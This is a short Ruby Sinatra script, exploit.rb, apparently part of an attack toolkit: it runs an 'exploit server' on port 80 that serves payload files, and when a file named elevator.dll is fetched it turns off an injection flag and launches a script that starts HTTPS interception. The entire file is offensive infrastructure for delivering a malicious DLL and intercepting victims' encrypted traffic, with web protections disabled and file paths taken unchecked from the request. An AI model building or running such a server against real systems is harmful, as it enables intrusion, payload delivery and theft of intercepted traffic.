exploit.rb
#!/usr/bin/env ruby
require 'sinatra'
require 'fileutils'
def log(text)
File.open('data/exploit.log', 'a') {|f| f.write text + "\n"}
puts text
end
def disable_injection
log "Disabling injection..."
if File.exist?('inject')
FileUtils.rm_f 'inject'
log "Injection disabled"
end
end
def enable_https_interception
log "Enabling https interception..."
system "bash ./scripts/07_proxy443_start.sh"
log "HTTPS interception enabled!"
end
configure do
set :bind, '0.0.0.0'
set :port, 80
disable :protection
log "Starting exploit server..."
end
get '/:file' do
log "Serving #{params[:file]}"
# don't cache the files
cache_control :no_cache, :max_age => 0
if params[:file].eql? 'elevator.dll'
disable_injection
enable_https_interception
end
send_file "./exploit/#{params[:file]}"
end